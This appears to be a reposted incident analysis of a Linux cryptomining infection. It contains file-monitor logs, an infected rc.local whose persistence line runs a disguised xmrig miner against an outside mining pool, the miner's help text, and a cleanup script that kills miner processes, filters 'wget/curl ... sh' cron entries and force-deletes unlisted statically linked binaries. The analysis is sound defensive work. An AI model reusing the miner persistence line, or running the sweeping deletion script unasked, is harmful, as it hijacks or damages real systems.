INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.625196
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.784003
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.949894
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.113563
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.273291
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.468209
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.611614
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.782594
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.947091
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.086717
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.267656
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.444056
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.619012
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.777156
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.921299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.114877
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.267230
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.420870
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.588299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.770619
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.933107
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.073582
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.258056
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.423030
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.599916
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.765426
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.914629
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.080883
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.242431
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.419305
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.584976
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.722322
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.911820
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.603662
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.747130
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.862070
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.888740
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.965000
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.152583
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.340117
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.464616
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.727373
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.882114
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.021524
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.231538
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.577823
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.012116
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.425070
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.815753
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.202723
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.674746
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.956017
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.388042
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.752932
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.136062
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.535232
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.918982
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.376316
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.713961
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.104982
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.473439
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.886292
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.239495
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.646030
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.044261
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.384033
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.469870
INFO:root:MODIFY event : /etc/rc.local  2019-03-20 15:15:38.510660
INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673229
INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673907
# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

/bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null
exit 0
root@92ae08a47348:/opt# ./dhpcd -h
Usage: xmrig [OPTIONS]
Options:
  -a, --algo=ALGO          specify the algorithm to use
                             cryptonight
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
      --rig-id=ID          rig identifier for pool-side statistics (needs pool support)
  -t, --threads=N          number of miner threads
  -v, --av=N               algorithm variation, 0 auto select
  -k, --keepalive          send keepalived packet for prevent timeout (needs pool support)
      --nicehash           enable nicehash.com support
      --tls                enable SSL/TLS support (needs pool support)
      --tls-fingerprint=F  pool TLS certificate fingerprint, if set enable strict certificate pinning
  -r, --retries=N          number of times to retry before switch to backup server (default: 5)
  -R, --retry-pause=N      time to pause between retries (default: 5)
      --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
      --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)
      --no-huge-pages      disable huge pages support
      --no-color           disable colored output
      --variant            algorithm PoW variant
      --donate-level=N     donate level, default 5% (5 minutes in 100 minutes)
      --user-agent         set custom user-agent string for pool
  -B, --background         run the miner in the background
  -c, --config=FILE        load a JSON-format configuration file
  -l, --log-file=FILE      log all output to a file
  -S, --syslog             use system log for output messages
      --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)
      --safe               safe adjust threads and av settings for current CPU
      --asm=ASM            ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.
      --print-time=N       print hashrate report every N seconds
      --api-port=N         port for the miner API
      --api-access-token=T access token for API
      --api-worker-id=ID   custom worker-id for API
      --api-id=ID          custom instance ID for API
      --api-ipv6           enable IPv6 support for API
      --api-no-restricted  enable full remote access (only if API token set)
      --dry-run            test configuration and exit
  -h, --help               display this help and exit
  -V, --version            output version information and exit

2019-03-22

#!/bin/bash

export LC_ALL=C
oldPATH="$PATH"
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

post_run_file=`mktemp`
test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$

sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab
rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.*
rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/."     " /tmp/.mountfs /tmp/seconfig /root/.ttp
chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad
chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync
rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad

pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems
pkill -9 xm32
pkill -9 xm64
pkill -9 ceurnad
pkill -9 .xmrig
pkill -9 -f /tmp/.xs/daemon.i686.mod
pkill -9 -f ./systma
pkill -9 -f /root/.local/syslogd
pkill -9 -f /tmp/samba
pkill -9 xorgg
pkill -9 sc64u
pkill -9 -f /tmp/su

if cd /etc/cron.hourly ; then
    for f in *;do
        grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f" && rm -f "$f"
    done
fi
crontab -l | grep -v 'wget .*sh' | grep -v 'curl .*sh' | grep -v '/pty .*/dev/null' | crontab -

if which file ; then
    #find ${PATH//:/ } | while read f; do file "$f";done | grep \
    find ${oldPATH//:/ } | xargs file | grep \
        'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \
        -e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \
        -e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \
        -e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \
        -e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \
        -e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \
        -e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \
        -e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \
        -e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \
        -e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \
        -e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \
        -e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \
        -e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \
        -e '/gofmt$' \
        -e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \
        -e '/xvbeat$' \
        -e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \
        -e '/usr/bin/valgrind' \
        -e '/usr/sbin/tzdata-update' \
        -e '/sbin/busybox' \
        -e '/sbin/cryptsetup' \
        -e '/sbin/dump' \
        -e '/sbin/e2fsck' \
        -e '/sbin/fsck.ext2' \
        -e '/sbin/fsck.ext3' \
        -e '/sbin/ldconfig' \
        -e '/sbin/mpath_ctl' \
        -e '/sbin/nash' \
        -e '/sbin/restore' \
        -e '/sbin/rmt' \
        -e '/sbin/sln' \
        -e '/bin/sln' \
        -e '/usr/sbin/build-locale-archive' \
        -e '/usr/sbin/glibc_post_upgrade.i686' \
        -e '/usr/sbin/glibc_post_upgrade.x86_64' \
        -e '/usr/sbin/libgcc_post_upgrade' \
        -e '/usr/sbin/prelink' \
        -e '/usr/sbin/plesk' \
        -e '/usr/bin/wine64-preloader' \
        -e '/usr/bin/wine-preloader' \
        -e '/bin/busybox' \
        -e '/bin/dhpcd' \
        -e '/mpath_prio_' \
        -e '/usr/sbin/sas2ircu' \
        -e '/usr/bin/rar' \
        -e '/usr/bin/rlpdump' \
        -e '/usr/bin/oracle' \
        -e '/sbin/init' \
        -e /usr/bin/netserve  \
        -e /sbin/auibusy \
        -e '/sbin/auplink' \
        -e /sbin/aumvdown \
        -e '/usr/local/bin/sas2ircu' \
        -e '/usr/local/bin/sas3ircu' \
        -e '/usr/sbin/glibc_post_upgrade' \
        -e '/sbin/discover' \
        -e '/usr/bin/jad' | while read ff;do
    chattr -i "$ff"
#    rm -vi "$ff"</dev/tty
    rm -f "$ff"
    if echo "$ff" | grep '/ps$' ; then
        echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file
    fi
    if echo "$ff" | grep '/ss$' ; then
        echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file
    fi
    if echo "$ff" | grep '/lsof$' ; then
        echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file
    fi
    if echo "$ff" | grep '/netstat$' ; then
        echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file
    fi
done
fi

echo More checks:
ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus

if which file ; then
    for l in /proc/*/exe;do file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections' && echo $l;done
fi


echo 'top -bn1 | head -n 20:'
top -bn1 | head -n 20

echo atq:
atq

echo 'crontab -l:'
crontab -l

echo /etc/crontab:
cat /etc/crontab

echo /etc/cron.hourly:
ls -la /etc/cron.hourly

echo /etc/cron.d:
ls -la /etc/cron.d

set -x
. $post_run_file
rm $post_run_file

来源:freebuf.com 2019-03-23 18:36:50 by: 陌度

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论